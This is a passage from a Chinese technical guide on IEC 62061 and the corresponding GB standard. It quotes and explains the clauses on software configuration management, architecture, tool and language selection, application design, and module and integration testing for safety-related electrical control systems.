(4)除此之外,还需要对软件进行测试和验证,其中包括应用软件的结构测试、集成应用程序的功能测试、与SRECS交互的接口测试以及软件集成到硬件体系结构中时的测试。应用软件的结构测试也称为白盒测试,主要是检查编写的源代码,确保实现了软件架构中定义的数据流和控制流,同时对源代码中的每条语句和分支结构都进行验证;集成应用程序的功能测试也称为黑盒测试,在测试时,按照黑盒测试方法规定的要求执行指定的测试用例,检测测试用例执行结果是否与测试程序中给定的测试结果相同;与SRECS交互的接口测试主要是结合黑盒测试和白盒测试的方法对接口信息流和控制流中的参数进行一一验证;软件集成到硬件体系结构中时进行的测试也称为软/硬件集成测试,即确保安装在硬件中的软件可以满足软件需求的要求。 4)应用软件测试计划的内容要求 软件测试是验证应用软件的主要方法,软件测试计划应包括以下内容。 (1)软件和硬件集成的验证策略。 基于需求的测试可以有效地发现程序中的错误。因此,在验证可执行目标代码是否符合软件需求时,首先要生成正常范围的测试用例。此外,还要选择基于需求的软/硬件集成测试方法。执行基于需求的软/硬件集成测试是用于确保安装于目标计算机中的软件可以满足软件需求的要求。具体的测试策略除包括正常输入或正常操作时的测试之外,还要考虑异常输入或操作时的鲁棒性测试 (2)测试用例和测试结果。 在测试时,按照测试方法规定的要求执行指定测试用例,检查测试用例执行结果是否与测试程序中给定的测试结果相同,以验证软件在目标计算机环境中面对正常输入或操作时是否满足软件需求。 (3)执行测试的种类。 执行测试时,除了要使用正常输入与条件范围的测试用例,还要考虑使用异常范围的测试用例,以检查软件在目标计算机环境中面对异常输入或异常操作时,可执行目标代码对软件需求的满足程度。异常测试的常用7种类型有数值范围、初始化程序、失效处理、循环越界、时间片越界、时间特性和状态转换。 (4)测试的设备。 软件测试计划中,应该包括执行测试时要使用到的一些测试工具,工具中使用的支持软件及相关的配置说明。 (5)测试通过准则。 在软件测试计划中,应该详细说明软件测试用例的通过准则,明确测试用例通过与否的条件。 (6)实际位置。 软件测试计划中应该明确具体测试地址与测试环境。 (7)外部功能性依赖。 软件测试计划中还要明确执行测试时依赖的外部条件。 (8)测试用例数量的要求。 软件测试计划中应该明确每个模块测试时应该测试的用例数量。 (9)相关功能或要求的完成情况。 最后,软件测试计划还要说明项目要实现的功能及相关要求的完成情况。 5)应用软件设计和开发的其他要求 同时执行非安全和安全相关控制功能时,应用软件应该作为安全相关软件来处理,除非有足够的证据表明非安全相关控制功能与安全相关控制功能有足够的独立性。 在应用软件设计时需要对数据的完整性和合理性进行检查,如通信链路的有效性检查、传感器数据的边界值检查,以及检查应用程序设计中所用到的每一个参数的数值是否在边界值的范围之内。 另外,进行应用程序设计时,需要对程序中的控制流和数据流进行监控,除非控制流和数据流的监控代码已经在嵌入式软件中被实现。在进行失效检测时,需要对程序中的控制流和数据流进行实时监控,使得系统保持在安全状态下运行。 在软件设计中如果需要调用以前开发的软件库函数,则需要证明调用的软件库函数符合软件安全要求规范。以前开发的软件库函数跟新开发的安全相关软件一样,要经过软件安全要求规范的验证和确认。 在软件开发过程中,如果对应用软件进行了修改或改动,那么需要对改动的软件模块及受该软件影响的其他模块进行重新验证,以确保该应用软件仍然能满足软件安全要求规范。 2. 软件配置管理 【IEC标准条款】 6.11.3.2 Software configuration management 6.11.3.2.1 The functional safety plan shall define the strategy for the development,integration,verification and validation of the software. 6.11.3.2.2 Software configuration management shall: -ensure that all necessary operations have been carried out to demonstrate that the required software safety integrity has been achieved; -maintain accurately and with unique identification all documents related to configuration items that are necessary to maintain the integrity of the SRECS.Configuration items shall include at least the following: ·safety analysis and requirements; ·software specification and design documents; ·software source code modules; ·test plans and results; ·pre-existing software modules and packages which are to be incorporated into the SRECS; ·all tools and development environments that are used to create or test,or carry out any action on the application software; -apply change-control procedures to: ·prevent unauthorized modifications; ·document modification requests; ·analyze the impact of proposed modifications,and to approve or reject the request(s); ·document the details of,and the authorization for,all approved modifications; ·document the software configuration at appropriate points in the software development; -document the following information to permit a subsequent audit:release status,the justification for and approval of all modifications,and the details of the modification; -formally document the release of the application software.Master copies of the software and all associated documentation shall be kept to permit maintenance and modification throughout the operational lifetime of the released software. 【GB标准条款】 6.11.3.2 软件配置管理 6.11.3.2.1 功能安全计划应规定软件开发、集成、验证和确认的策略。 6.11.3.2.2 软件配置管理理应: ——确保所有必要操作已执行,并证明达到了软件安全完整性要求。 ——准确保持和唯一识别有关配置项目的所有文件,这是为保持SRECS的完整性所需要的。配置项目至少应包括: ·安全分析和要求; ·软件规范和设计文件; ·软件源代码模块; ·测试计划和结果; ·将被并入SRECS的预存软件模块和软件包; ·在应用软件上用于创建和测试,或执行任何动作的所有工具和开发环境。 ——应用改变控制程序: ·防止未经授权的修改; ·文件修改请求; ·分析提议的修改的冲突,通过或拒绝请求; ·授权和所有批准的修改的详细文件; ·软件开发中在适当点提供软件配置文件。 ——为下述信息提供文件,允许随后的审计:版本状态,批准所有修改的理由和修改细节。 ——正式应用软件的版本文件,软件和所有相关文件的原版备份应保存,允许维护和修改能够在发行软件的生命周期内完全有效。 功能安全计划过程包括软件开发过程、软件集成过程、软件验证和确认过程。 软件开发过程又包括了软件需求定义过程、软件设计过程及软件编码过程。软件需求定义过程的输入是分配给软件的系统需求,主要输出是软件的高级需求,即软件的功能需求、性能需求、软/硬件接口和安全相关需求等内容;软件设计过程的输入是前面提到的软件高级需求、软件开发计划和软件设计标准,主要输出的是设计描述,包括软件架构和低级需求;软件编码过程根据软件低级需求和软件架构编写软件的源代码,此过程的输出结果是源码和目标码。 软件集成过程对源码和目标码进行编译、链接,并加载到机载系统或设备中。该过程应包含软件集成和软/硬件集成两个子过程。 为了确保软件的功能安全,需要对上述的过程进行一一验证和确认,即软件需求定义过程输出结果的验证、软件设计过程输出结果的验证、软件编码过程输出结果的验证、软件集成过程输出结果的验证及软件验证过程输出结果的验证和确认。 软件配置管理规定要求如下。 (1)软件配置管理要确保所有功能安全相关的操作都已被执行,并有足够的证据表明软件达到了安全完整性要求。 (2)所有配置项目相关的文件应进行唯一的标识,其中包括安全分析和要求相关的文件,软件设计规范文件,软件源代码模块相关文件,测试计划和结果相关文件,将要被并入安全相关电气控制系统的软件模块和软件包文件,对软件进行开发、测试、验证等操作工具相关的文件。如果需要对软件进行复制、再生产、重新测试或修改操作,就需要迅速地找到正确的软件产品及相应的配置项目文件。如同图书馆的日常管理一样,对每一版本软件和配置项目文档建档,并将同类数据进行归类处理。同时,通过建立搜索方法,方便日后不同的软件研发人员搜索需要的软件资料。 (3)在软件开发过程中经常会出现软件过程与计划和标准不相符、软件生命周期输出存在缺陷、软件运行异常等。这需要对出现问题的地方进行记录和标记,并告知软件开发人员直到问题得到解决。问题的报告机制很好地发挥了这样的作用。此外,变更也是软件开发中必然会发生的事情。如何记录、评估和执行更改是软件开发中必须要解决的问题,具体的变更流程如下:当需要变更文件时,首先要提出文件修改请求,以防止未经授权的修改;其次,如果提出的修改与以前的观点冲突,则应该拒绝文档修改请求;接着,对于合理的修改请求,项目组需要授权和批准所有修改的详细文件;最后,在适当时候,在软件开发中制定软件配置文件。 (4)制定相关文件,说明文件版本信息的更改、文件被整改的理由,以及文件被整改的细节。 (5)所有应用软件的版本,以及所有被整改文件的原版都应该进行冗余保存,并允许在软件发行的生命周期内对软件进行维护和修改。 3. 软件的体系结构要求 【IEC标准条款】 6.11.3.3 Requirements for software architecture 6.11.3.3.1 The software architecture design shall be based on the required SRECS safety specification within the constraints of the system architecture of the SRECS and the subsystem design. 6.11.3.3.2 The software architecture design shall: a) provide a comprehensive description of the internal structure and of the operation of the SRECS and of its components (see Note); b) include the specification of all identified software components,and the description of connection and interactions between identified components (software and hardware); c) include the internal design and architecture of all identified components that are not black boxes; d) identify the software modules included in the SRECS but not used in any mode of safety-related operation. 6.11.3.3.3 A set of techniques and measures necessary during design of the application software to satisfy the specification shall be described and justified.These techniques and measures shall aim at ensuring the predictability of the behaviour of the SRECS and shall be consistent with any constraints identified in the SRECS documentation. 6.11.3.3.4 Measures used for maintaining the integrity of all data shall be described and justified.Such data may include machine input-output data,communications data,operation interface data,maintenance data and internal database data. 【GB标准条款】 6.11.3.3 软件体系结构要求 6.11.3.3.1 在SRECS系统结构限制和子系统设计范围内,软件体系结构设计应遵循SRECS的安全规范。 6.11.3.3.2 软件体系结构设计应: a)提供内部结构、SRECS操作及其部件的综合描述; b)包括所有识别的软件部件规范,以及识别的部件(软件与硬件)之间的连接和交换描述; c)包括内部设计和所有不是黑箱的识别部件的体系结构; d)识别SRECS中但未在任何安全相关操作模式中使用的软件模块。 6.11.3.3.3 为满足规范要求,在应用软件设计期间的一套技术和措施应被描述和证明。这些技术和措施应确保SRECS行为的可预见性,并与SRECS文件中任何识别的限制一致。 6.11.3.3.4 应描述和证明用于保持所有数据完整的措施。这类数据可以包括机器的输入和输出数据、通信数据、操作接口数据、维修数据和内部数据库数据。 在对安全相关电气控制系统和其子系统进行设计时,应该遵循SRECS的安全规范。 软件体系结构是指在一定的设计原则基础上,从不同角度对组成软件的各个部分分别进行搭配和安排,形成软件的多个结构和组成架构,它包括软件的各个组件(软件组件、硬件组件、软/硬件集成组件)的描述,其中有组件的内部结构属性、组件的外部可见属性及组件之间的相互关系。在软件设计过程中,根据软件需求定义过程的输出——软件需求,通过一次或多次的迭代求精,直到程序组件的层次结构、组件间的交互方式及组件使用的数据结构都可以用程序设计语言来表达为止。 除此之外,软件体系结构设还要提供SRECS安全操作相关的综合描述,并且能识别出在安全相关电气控制系统中使用但没进行任何安全相关操作的软件模块。 同时,为了满足安全相关电气控制系统规范的要求,在应用软件设计期间所有的技术或相关措施都应该被文档化。利用这些文档数据,可以证明软件设计技术可以达到安全相关电气控制系统规范的要求,并确保可以控制安全相关电气控制系统的行为,与此同时,还要与安全相关电气控制系统的其他限制文件不冲突。 同时,软件体系结构设计还应对保持数据完整性和证明数据完整性的措施进行说明,以确保数据的安全,其中涉及的数据包括机器界面的输入和输出数据、机器的通信数据、人机操作接口数据、机器的维修数据及软件内部数据库中的数据等。 4. 支持工具、用户手册和应用语言要求 【IEC标准条款】 6.11.3.4 Requirements for support tools,user manual and application languages 6.11.3.4.1 A suitable set of tools,including configuration management,simulation,and test harness tools shall be selected.The availability of suitable tools (not necessarily those used during initial system development) to supply the relevant services over the lifetime of the SRECS shall be considered.The suitability of the tools shall be explained and documented. 6.11.3.4.2 Wherever necessary a sub-set of the application programming language shall be defined. 6.11.3.4.3 Application software shall be designed taking into account constraints and known weaknesses included in the SRECS and subsystem(s) user manuals. 6.11.3.4.4 The application language selected shall either: -be processed using a translator/compiler which shall be assessed to establish its fitness for purpose; -be completely and unambiguously defined or restricted to unambiguously defined features;-correspond to the characteristics of the application;NOTE An application's characteristics refer,for example to any performance constraints. -contain features that facilitate the detection of programming mistakes;and -support features that match the design method; or,the deficiencies of the language used shall be documented in the software architecture design description and the fitness for purpose of the language shall be explained including additional measures necessary to address the identified shortcomings of the language. 6.11.3.4.5 The procedures for use of the application language shall specify good configuration practice,proscribe unsafe generic software features (for example,undefined language features,unstructured designs,etc),identify checks that can be used to detect errors in the configuration and specify procedures for documentation of the application program.As a minimum,the following information shall be contained in the application program documentation: a) legal entity (for example company,author(s),etc); b) description; c) traceability to application functional requirements; d) traceability to standard library function; e) inputs and outputs;and f) configuration management. 【GB标准条款】 6.11.3.4 支持工具、用户手册和应用语言要求 6.11.3.4.1 应选择一组合适的工具,包括配置管理、模拟和测试装备工具。应考虑合适工具的可用性(最初系统开发时不使用的工具),以便在SRECS的生命周期内提供相关的服务。工具的可用性应说明和形成文件。 6.11.3.4.2 必要时,应规定应用编程语言子集。 6.11.3.4.3 应用软件的设计应考虑限制,以及在SRECS和子系统用户手册中包括的已知缺陷。 6.11.3.4.4 选择应用语言应: ——使用翻译器/编译器处理的应评估以使其适应用途; ——定义完全和明确或仅限于明确定义的特征; ——对应于应用特征; ——便于检查编程错误的包含特征; ——匹配设计方法的支持特征; 或者,在软件体系结构设计描述中,使用语言的不足应形成文件,语言用途的适应性应说明,包括:识别的语言缺陷所需的附加措施。 6.11.3.4.5 应用语言使用程序应规定良好的配置实践,禁止非安全通用软件特征(例如未定义语言特征、非结构化设计等),识别检查能用于检测结构错误,规定应用程序的文件程序。至少,应用程序文件应包含下列内容: a)合法实体(例如公司、作者等); b)描述; c)应用功能要求的可追溯性; d)标准库函数的可追溯性; e)输入和输出; f)结构管理。 在现代软件工程中,工具已经出现在软件研制过程的各个环节中。在常见的软件研制环节中,使用的工具包括软件需求工具、软件设计工具、软件架构工具、软件配置管理工具、软件模拟和测试装备工具。这些工具的使用可以提高软件的开发效率,并且在正确使用相关工具的条件下还有望能提高软件的质量,从而提高安全相关电气控制系统在生命周期内相关服务的质量。当然,如果工具中存在错误或未能正确地使用工具,则会带来负面影响,因此在使用工具时,应考虑工具的可用性,以避免工具应用给控制软件带来风险。除此之外,工具的可用性说明应该被文档化,以方便软件开发人员日后查阅。 不同的编程语言有不同的编程规范,同样它们也有不同的安全特性。因此,在安全相关电气控制系统设计期间,如果有需要,则还应该规定好系统的编程语言子集。 应用软件的设计还要考虑在现有资源条件下的一些限制,同时,安全相关电气控制系统用户手册还应包括系统及其子系统的一些已知缺陷,以方便用户使用。 安全相关电气控制系统软件在选择应用语言时的有的要求,如使用翻译器/编译器处理的程序语言,应考虑其对系统的适应性;除此之外,还应考虑程序语言的明确定义特征、程序语言的应用特征、程序语言检测编程错误的特征、程序语言对匹配设计算法是否支持等。在软件体系结构设计中,使用的编程语言文件不足以形成说明文档,因此还需要对编程语言的适应性进行进一步说明,同时还要识别语言的缺陷,并针对语言的缺陷提供额外的保障措施。 应用程序语言应规定好具体的配置过程;避免非安全的通用软件特征,如程序语言使用未定义的语言特征,非结构化的设计等;能识别出结构的一些错误。除此之外,还要规定好应用程序文件,其中应用程序文件的内容应包括:合法公司或作者的署名;对程序功能的描述;标明应用功能和标准库函数的文档来源,从而便于追溯;对函数的输入/输出接口进行说明;对程序的整体结构及管理的描述。 5. 应用软件设计要求 【IEC标准条款】 6.11.3.5 Requirements for application software design 6.11.3.5.1 The following information shall be available prior to the start of detailed application software design: -the software safety requirements specification; -the description of the software architecture design including identification of the application logic and fault tolerant functionality,a list of input and output data,the generic software modules and support tools to be used and the procedures for configuring the applicationsoftware with the available materials to provide the application functionality for the defined I/O;and -the plan for validating the software safety. 6.11.3.5.2 The application software shall be produced in a structured way to achieve: -modularity of application functionality and of I/O control data; -testability of functionality (including fault tolerant features) and of internal structure; -the capacity for safe modification through provision of adequate traceability and explanation of application functions and associated constraints. 6.11.3.5.3 For each major component/subsystem in the description of the application software architecture design (see 6.11.3.5.1),refinement of the design shall be based on: -functions which are used in a recurring fashion throughout the design; -mapping of the input/output information of application software modules; -realisation of the application functions from the generic software functions and I/O mapping. 6.11.3.5.4 The design of each application software module and the structural tests to be applied to each application software module shall be specified. 6.11.3.5.5 Appropriate software and SRECS integration tests shall be specified to ensure that the application program satisfies the specified requirements for application software safety.The following shall be considered: -the division of the application software into manageable integration sets; -test cases; -types of tests to be performed; -test environment,tools,configuration and programs; -test criteria on which the completion of the test shall be judged;and -procedures for corrective action on failure of test. 【GB标准条款】 6.11.3.5 应用软件设计要求 6.11.3.5.1 以下信息应在应用软件详细设计开始之前得到: ——软件安全要求规范; ——软件体系结构设计描述,包括应用逻辑和故障容错功能识别、输入和输出数据表、通用软件模块、使用的支持工具和与可用材料一起配置应用软件的程序,以便为定义的I/O提供应用功能性; ——确认软件安全计划。 6.11.3.5.2 应用软件应以结构的方法产生,以达到: ——应用功能以及I/O控制数据的模块性; ——功能(包括容错特征)和内部结构的易测性; ——安全修改能力,通过规定适当的可追溯性和应用功能及相关限制说明实现。 6.11.3.5.3 在应用软件体系结构设计的描述中,对于各主要部件/子系统,设计优化应基于: ——功能,以循环方式应用于整个设计; ——应用软件模块的输入/输出信息映射; ——通用软件功能和I/O映射实现应用功能。 6.11.3.5.4 应规定各应用软件模块的设计和用于各应用软件模块结构的测试。 6.11.3.5.5 应规定适当软件和SRECS集成测试,以保证应用程序满足规定的应用软件安全要求。应考虑下列项目: ——应用软件分割成可管理的集成集; ——测试实例; ——执行的测试类型; ——测试环境、工具、配置和程序; ——测试准则,用来判断测试完成情况; ——对测试失效,用于纠正行为的程序。 在软件设计过程中,详细设计过程的输入有:软件安全要求规范;软件体系结构设计描述,包括对应用逻辑和故障容错功能的描述、输入和输出数据说明、软件支持工具和可用材料的配置说明;软件安全计划等。 应用软件应以软件架构的方式产生,软件架构是指在一定的设计原则基础上,从不同角度对组成软件的各部分进行搭配和安排,形成软件的多个结构,包括该软件的各个组件、组件的外部可见属性和组件之间的相互关系。最终,应用软件的应用功能及I/O控制数据应该模块化;方便对应用软件的功能模块和内部模块进行测试。除此之外,应用软件还应具备安全修改架构信息的能力,安全修改能力的实现方式有:通过对修改过程进行记录,形成规范的文档,从而达到信息修改的可追溯性;对各个应用功能的限制条件进行说明。 在应用软件体系结构的主要部件及子系统中,为了达到优化设计的目的,首先需要以循环验证的方式应用于整个设计。其次,要规定好应用软件模块的输入/输出信息映射关系。最后,通过通用的软件功能和I/O映射方式来开发真正的应用功能。 软件模块设计是软件设计过程中初始阶段需要完成的工作,它建立起由需求过程到设计过程的关键纽带。软件架构提供了待建系统的整体视图,用于描述软件模块的结构和组织、它们的性质及它们之间的连接等。要确认软件模块信息与软件需求信息是否匹配。检查这两者之间的兼容性,必要时分析设计的软件模块在满足需求方面的效力。软件模块和软件需求之间的兼容性可以通过人工检查配合测试的方法来实现。 应用软件模块之间的接口以数据流和控制流的形式存在,所以要确保软件模块间接口关系的正确性。在需要的时候,模块要加入适当的保护机制,以防止模块通过接口带来错误的输入。 软件模块进行测试时,一般都通过人工检查配合基于需求的测试来表明符合性,两者得出的结论应能互相印证。个别无法通过测试完全证明的目标可辅以人工分析的报告结论证明。 在具体的测试过程中,可以把软件分割成容易管理的多个软件模块,然后为每一个模块都准备好要测试的类型、测试的环境、测试的工具及参数配置,并确定好测试通过的准则,接着便可设计测试用例执行测试了。除此之外,对测试不通过的案例,还需要纠正对应的软件模块,以增加软件实际运行的安全性。 6. 应用代码开发要求 【标准条款】 6.11.3.6 Requirements for application code development 6.11.3.6.1 The application software shall: -be readable,understandable and testable; -satisfy the relevant design principles; -satisfy the relevant requirements specified during safety planning. 6.11.3.6.2 The application software shall be reviewed to ensure conformance to the specified design,the coding rules and the requirements of safety planning. 【GB标准条款】 6.11.3.6 应用代码开发要求 6.11.3.6.1 应用软件应: ——可读、可理解、可测试; ——满足有关设计原则; ——满足安全计划中规定的相关要求。 6.11.3.6.2 应用软件应得到核对,以保证与指定设计、编码规则和安全规划要求一致。 在软件编码过程中,根据软件需求和软件架构,按照所挑选的编程语言的编程规范编写代码,进而形成源代码。需要注意的是,代码实现的功能要与安全计划和有关设计原则中的要求一致。同时,编写的代码要有良好的可读性、可理解性及可测试性。 按照软件架构、软件需求,遵循软件安全规划中的软件编码准则,设计开发软件源代码。源代码本身也必须建立对上级需求和设计的追溯关系。 7. 应用模块测试要求 【IEC标准条款】 6.11.3.7 Requirements for application module testing 6.11.3.7.1 The configuration of each input and output point shall be checked through review,testing,or simulation to confirm that the I/O data is mapped to the correct application logic. 6.11.3.7.2 Each software module shall be checked through a process of review,simulation and testing to determine that the intended function is correctly executed and unintended functions are not executed. 6.11.3.7.3 The tests shall be suitable for the specific module being tested and shall: -ensure each branch of any application software modules is exercised; -ensure boundary data is exercised; -ensure sequences are correctly implemented,including relevant synchronisation conditions. 6.11.3.7.4 The results of the application software module testing shall be documented. 6.11.3.7.5 Where software has already been assessed or when a significant amount of positive operating experience is available,the amount of testing may be reduced. 【GB标准条款】 6.11.3.7 应用模块测试要求 6.11.3.7.1 每个输入和输出点的配置应检查,凭借评审、测试或模拟,确认I/O数据映射到正确的应用逻辑。 6.11.3.7.2 每个软件模块应检查,凭借过程评审、模拟和测试,确定预期功能被正确执行,而非预期功能不能执行。 6.11.3.7.3 测试应符合受试的特定模块,还应: ——保证任何应用软件模块的各分支经过练习; ——保证边界数据经过练习; ——保证正确执行顺序,包括有关同步条件。 6.11.3.7.4 应用软件模块测试结果应形成文件。 6.11.3.7.5 已经被评估的软件或大量的积极操作经验可用时,测试的数量可能会减少。 对应用模块测试时,需要对每一个输入点和输出点的配置都进行重点检查,从而确保源代码的准确性和一致性。同时,还要通过专家评审、测试或模拟仿真的方式确认I/O数据已经映射到正确的应用逻辑中。 进行应用模块测试时,还需要对每一个软件模块进行重点检查,并通过专家评审、测试或模拟仿真等方式确认软件需求中的功能都被正确执行,而软件需求中没有规定的要求不能被执行。 对特定模块的测试,还需要保证下面三个方面的测试内容。 (1)每个软件模块的判定覆盖。 这里所谓的判定覆盖是指设计若干测试用例,运行被测程序,使得程序模块中的每一个判定取真分支和取假分支至少经历一次。 (2)边界值测试。 在测试软件模块时,还需要对软件模块的输入和输出参数进行边界值测试,以确保源代码的准确性和一致性。 (3)测试程序正确。 这里的测试程序是指在测试用例的基础上建立的执行测试的详细程序,以自动化测试环境为例,测试程序包括初始化测试环境、调用程序接口、测试的输入集和期望输出及判定准则等。通过检测测试用例和测试用例的执行情况,评估测试结果,评估所使用的测试环境,从而确定所设计的测试程序的正确性。 应用软件模块的测试结果要以文档的形式保存起来,方便日后测试工程师追溯。 如果软件模块已经被评估过,且测试人员对此类测试模块有较为丰富的测试操作经验,那么用于执行测试的测试用例可适当减少。 8. 应用软件集成测试要求 【IEC标准条款】 6.11.3.8 Requirements for application software integration testing 6.11.3.8.1 The application software tests shall verify that all application software modules and components/subsystems interact correctly with each other and with the underlying embedded software to perform their intended function and do not perform unintended functions that could jeopardize any safety function. 6.11.3.8.2 The results of application software integration testing shall be documented,stating: -the test results;and -whether the objectives of the test criteria have been met. 6.11.3.8.3 If there is a failure,the reasons for the failure and corrective action taken shall be included in the test results documentation. 6.11.3.8.4 During application software integration,any modification or change to the software shall be subject to a safety impact analysis that shall determine: -all software modules impacted;and -all necessary re-verification and re-design activities. 【GB标准条款】 6.11.3.8 应用软件集成测试要求 6.11.3.8.1 应用软件测试应验证所有应用软件模块和部件/子系统彼此正确交互,用基本的嵌入式软件执行预期功能,而不执行可能危害任何安全功能的非预期功能。 6.11.3.8.2 应用软件综合测试结果应形成文件,陈述: ——测试结果; ——是否符合测试准则的目标。 6.11.3.8.3 如有失效,测试结果文档内应包括失效原因以及采取的纠正措施。 6.11.3.8.4 在应用软件集成期间,软件的任何修改或变更应按照安全影响分析进行,确定如下内容: ——受影响的所有软件模块; ——所有必须重新验证和重新设计的活动。 基于需求的测试可以有效发现程序中的错误。因此,在验证可执行目标代码是否符合软件需求时,首先需要生成正常范围的测试用例。此外,还要选择基于需求的软件集成测试方法。执行软件集成测试用于确保软件成分之间能够正常交互,并且符合软件需求和软件架构。在测试时,按照测试方法规定的要求执行指定测试用例,检查测试用例执行结果是否与测试程序中给定的测试结果相同,以验证嵌入式软件在目标计算机环境中是否执行了预期的功能,防止嵌入式软件执行可能危害功能安全的非预期功能,并把最终的测试结果形成文件保存起来。 除此之外,还要按照测试方法规定的要求执行指定测试用例,如果检查测试用例执行结果与测试程序中给定的测试结果不同,则需要对软件采取纠正措施,以防止嵌入式软件执行可能危害功能安全的非预期功能。 在应用软件的集成测试期间,如果发现软件存在问题,则需要对软件进行纠正,但是在纠正之前,必须按照安全相关规定对软件进行安全影响分析,分析被改动部分可能对其他软件模块造成的影响。修改完毕后,还需要对软件进行重新设计和重新验证。 4.6 安全相关电气控制系统的集成和测试 4.6.1 安全相关电气控制系统集成和测试的一般要求 【IEC标准条款】 6.12 Safety-related electrical control system integration and testing 6.12.1 General requirements 6.12.1.1 The SRECS shall be integrated according to the specified SRECS design.As part of the integration of all subsystems and subsystem elements into the SRECS,the SRECS shall be tested according to the specified integration tests.These tests shall verify that all modules interact correctly to perform their intended function and not perform unintended functions. 6.12.1.2 The integration of safety-related application software into the SRECS shall include tests that are specified during the design and development phase to ensure the compatibility of the application software with the hardware and embedded software platform such that the functional and safety performance requirements are satisfied. 6.12.1.3 Appropriate documentation of the integration testing of the SRECS shall be produced,stating the test results and whether the objectives and criteria specified during the design and development phase have been met.If there is a failure,the reasons for the failure shall be documented,corrective action taken and re-testing carried out. 6.12.1.4 During the integration and testing,any modification or change to the SRECS shall be subject to an impact analysis that shall identify all components affected and additional verification. 6.12.1.5 During SRECS integration testing,the following shall be documented: a) the version of the test specification used; b) the criteria for acceptance of the integration tests; c) the version of the SRECS being tested; d) the tools and equipment used along with calibration data; e) the results of each test; f) all discrepancies between expected and actual results; g) the analysis made and the decisions taken on whether to continue the test or issue a change request,in the case where discrepancies occur. 【GB标准条款】 6.12 安全相关电气控制系统集成与测试 6.12.1 一般要求 6.12.1.1 SRECS应按规定的SRECS设计集成。作为所有子系统和子系统元素的一部分集成到SERCS,应按照规定的集成测试进行SRECS测试。这些测试应验证所有模块正确交互,以执行他们预期功能,不执行非预期功能。 6.12.1.2 安全相关应用软件集成到SRECS应包括在设计和开发阶段规定的测试,以保证应用软件和硬件及嵌入式软件平台的兼容性,从而满足功能和安全性能要求。 6.12.1.3 应制定SRECS集成测试的恰当文件,表述测试结果是否达到了设计开发阶段规定的目标和准则,如果有失效,则失效的原因应该形成文档,并进行纠正行动和重新测试。 6.12.1.4 集成和测试期间,对SRECS的任何修改或变化应进行影响分析,并应识别所有受影响的部件和附加验证。 6.12.1.5 在SRECS集成测试期间,应形成下列文件: a)所有测试规范的版本; b)集成测试可接受的准则; c)受试的SRECS版本; d)使用的工具和设备连同校准数据; e)每次测试的结果; f)期望和实际结果之间的所有差异; g)在发生差异的地方,所做的分析和决定是否继续测试或提出改变要求。 基于需求的测试可以有效发现程序中的错误。因此,在验证可执行目标代码是否符合软件需求时,首先需要生成正常范围的测试用例。然后把所有的子系统和子系统元素集成到安全相关电气控制系统中,接着选择基于需求的软/硬件集成测试方法执行测试。执行基于需求的软/硬件集成测试是用于确保安装于目标计算机中的软件可以满足需求的要求,确保所有模块之间能正常交互。在测试时,按照测试方法规定的要求执行指定测试用例,检查测试用例执行结果是否与测试程序中给定的测试结果相同,以验证嵌入式软件在目标计算机环境中是否执行了预期的功能,并防止嵌入式软件执行可能危害功能安全的非预期功能。 在集成过程中,根据源代码生成可被目标嵌入式平台处理单元直接利用的代码形式,即可执行目标代码。在完成软件设计阶段、软件开发阶段和软件集成阶段规定的测试后,把生成的可执行代码装载进目标嵌入式平台中,进行软/硬件集成测试,以验证软件、硬件及嵌入式软件平台的兼容性,从而确保软件能满足功能和安全性能的要求。 安全相关电气控制系统在软/硬件集成测试过程中,应检验控制系统每一个测试用例的测试结果是否达到了设计开发阶段规定的目标和准则,并将测试结果制作成文件保存起来,以方便以后的追溯。除此之外,在测试过程中,如有失效的测试案例,还需要分析测试失效的原因,并记录在文档中,从而为后面的纠正和重新测试活动提供依据。 同时在安全相关电气控制系统的集成测试期间,如果发现安全相关电气控制系统存在问题,则需要对相关电气控制系统进行纠正,但是在纠正之前,必须按照安全相关规定对系统进行安全影响分析,分析被纠正部分可能对其他系统部件造成的影响。修改完毕后,还需要重新对系统进行验证活动。 最后,SRECS集成测试期间应记录到文件中的内容包括:所有测试规范的版本;集成测试通过的准则;被测试的SRECS版本;使用的工具、设备连同它们的校准数据信息;每一个测试的测试结果;测试用例执行结果与测试程序中给定的测试结果的差异信息;如果测试用例执行结果与测试程序中给定的测试结果存在差异,则需要对差异信息进行分析,以决定是否继续进行测试或者提出改变的要求,并对改变要求进行记录。 4.6.2 安全相关电气控制系统集成和测试的验证 【IEC标准条款】 6.12.2 Tests to determine systematic safety integrity during SRECS integration 6.12.2.1 Testing to reveal faults and to avoid failures during integration of the application software and hardware shall be applied.During the tests,reviews shall be carried out to see whether the specified characteristics of the SRECS have been achieved. 6.12.2.2 The following tests shall be applied: a) functional tests where data that adequately characterizes the operation are applied to the SRECS.The outputs shall be observed and their response is compared with that given by the specification.Deviations from the specification and indications of an incomplete specification shall be documented;and b) dynamic tests to verify the dynamic behaviour under realistic functional conditions and reveal failures to meet the SRECS functional specification,and to assess utility and robustness of the SRECS. 【GB标准条款】 6.12.2 SRECS集成时,决定系统安全完整性测试 6.12.2.1 应用软件和硬件集成期间,暴露故障和避免失效的测试应使用。测试期间,应进行评审,考虑是否达到了规定的SRECS特性。 6.12.2.2 应进行下列测试: a)在充分表征操作的数据处,对SRECS应用功能测试。应观察输出,其影响与规范规定的进行比较。偏离规范和未完成规范的指示应形成文件; b)在实际功能的条件下,验证动态行为的动态测试和满足SRECS功能规范的显示失效,并评估SRECS的实用性和鲁棒性。 在软件和硬件集成测试期间,尽可能避免使用失效的测试用例,并且设计的测试用例应该尽可能去找出系统存在的故障。与此同时,在测试期间,测试评审小组应该评审测试工程师对系统所做的测试是否达到了SRECS安全特性的要求。 SRECS集成时,应进行如下的测试。 (1)在操作数据的接口处,应对SRECS应用功能进行一一测试,将其输出结果与预期结果进行比较。 (2)在使用一份面向过程的涵盖全世界所有安全相关控制软件研制活动的审定要求时,必然会出现不同程度的偏离。通常来说,在应用IEC 62061标准过程中常见的偏离或不确定,需要根据具体的情况与审查人员协商可接受的符合性方法。由于这些问题大部分与项目研制的具体情况或者系统研制情况有关,因此很难给出统一的解决方案。同时,这些偏离规范和未完成规范的指示要求应该形成文件被保存下来。 (3)在进行功能测试时,对系统的动态行为应该进行动态测试,以检验SRECS功能规范中规定的失效行为。除此之外,还需要对SRECS的实用性和鲁棒性进行评估。 第5章 安全相关机械/工业机器人控制系统软件的确认 5.1 确认活动的目标 【IEC标准条款】 8 Validation of the safety-related electrical control system NOTE Validation of the SRECS may form a part of the validation activities applied to the overall machine design. 8.1 Objective This Clause specifies the requirements for the validation process to be applied to the SRECS.This includes inspection and testing of the SRECS to ensure that it achieves the requirements stated in the safety requirements specification. 【GB标准条款】 8 